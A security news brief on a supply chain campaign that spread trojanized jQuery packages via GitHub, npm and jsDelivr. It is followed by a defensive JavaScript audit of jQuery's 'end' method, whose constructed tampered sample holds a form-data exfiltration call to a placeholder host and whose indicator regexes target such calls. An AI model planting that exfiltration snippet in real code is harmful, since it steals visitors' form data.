Up to 68 malicious variants of jQuery have been distributed across GitHub, npm, and jsDelivr as part of a sophisticated supply chain intrusion, The Hacker News reports. The trojanized jQuery packages, which have been published since late May, had malware integrated into the library's rarely used "end" function that enabled exfiltration of website form data to a remote URL, according to a Phylum report. The naming variations, the presence of personal files, and the prolonged uploading period suggest that the packages may have been assembled manually.

Researchers also discovered that GitHub URLs were created automatically in jsDelivr, without any explicit upload to the CDN. "This is likely an attempt by the attacker to make the source look more legitimate or to sneak through firewalls by using jsDelivr instead of loading the code directly from GitHub itself," said Phylum. The findings follow Datadog's discovery of several Python Package Index packages with second-stage binary deployment capabilities.
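
The following added example, which is not code from Phylum's report or from the jQuery project, audits the `end` method of a jQuery build against the upstream body and flags network calls, form reads and hard-coded URLs inside it. The upstream body string, the indicator list and both sample sources are assumptions constructed for illustration.

```javascript
// Added example: audit the `end` method of a jQuery build.
// Assumption: upstream `end` is the single statement below.
const UPSTREAM_END = "return this.prevObject || this.constructor();";

// Tokens that have no place in `end` (assumed indicator list).
const INDICATORS = [
  ["network call", /\b(ajax|fetch|XMLHttpRequest|sendBeacon)\b/],
  ["form data read", /\b(serialize|serializeArray|FormData)\b/],
  ["hard-coded URL", /https?:\/\//i],
];

// Strip whitespace and restore the final `;` that minifiers drop.
function normalize(body) {
  const flat = body.replace(/\s+/g, "");
  return flat.endsWith(";") ? flat : flat + ";";
}

// Return the body of `end: function () {...}`, or null if it is absent.
// Naive brace matching: braces inside string or regex literals would confuse it.
function extractEndBody(source) {
  const m = /\bend\s*:\s*function\s*\(\s*\)\s*\{/.exec(source);
  if (!m) return null;
  const start = m.index + m[0].length;
  let depth = 1;
  for (let i = start; i < source.length; i++) {
    if (source[i] === "{") depth++;
    else if (source[i] === "}" && --depth === 0) return source.slice(start, i);
  }
  return null; // unbalanced braces
}

function auditEnd(source) {
  const body = extractEndBody(source);
  if (body === null) return { found: false, matchesUpstream: false, reasons: [] };
  const reasons = INDICATORS.filter(([, re]) => re.test(body)).map(([name]) => name);
  return { found: true, matchesUpstream: normalize(body) === normalize(UPSTREAM_END), reasons };
}

// Constructed samples, not taken from the campaign.
const CLEAN = "jQuery.fn = { end: function() {\n  return this.prevObject || this.constructor();\n}, eq: function(i){} };";
const TAMPERED = 'jQuery.fn={end:function(){$.ajax({url:"https://collector.example.invalid/",' +
  'data:$("form").serialize()});return this.prevObject||this.constructor()},eq:function(i){}};';

console.log(auditEnd(CLEAN));
console.log(auditEnd(TAMPERED));
```

A build whose `end` neither matches upstream nor is found at all deserves manual review; pinning script tags with Subresource Integrity hashes prevents a swapped file from loading in the first place.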
Application security, Supply chain
Supply chain attack spreads trojanized jQuery packages
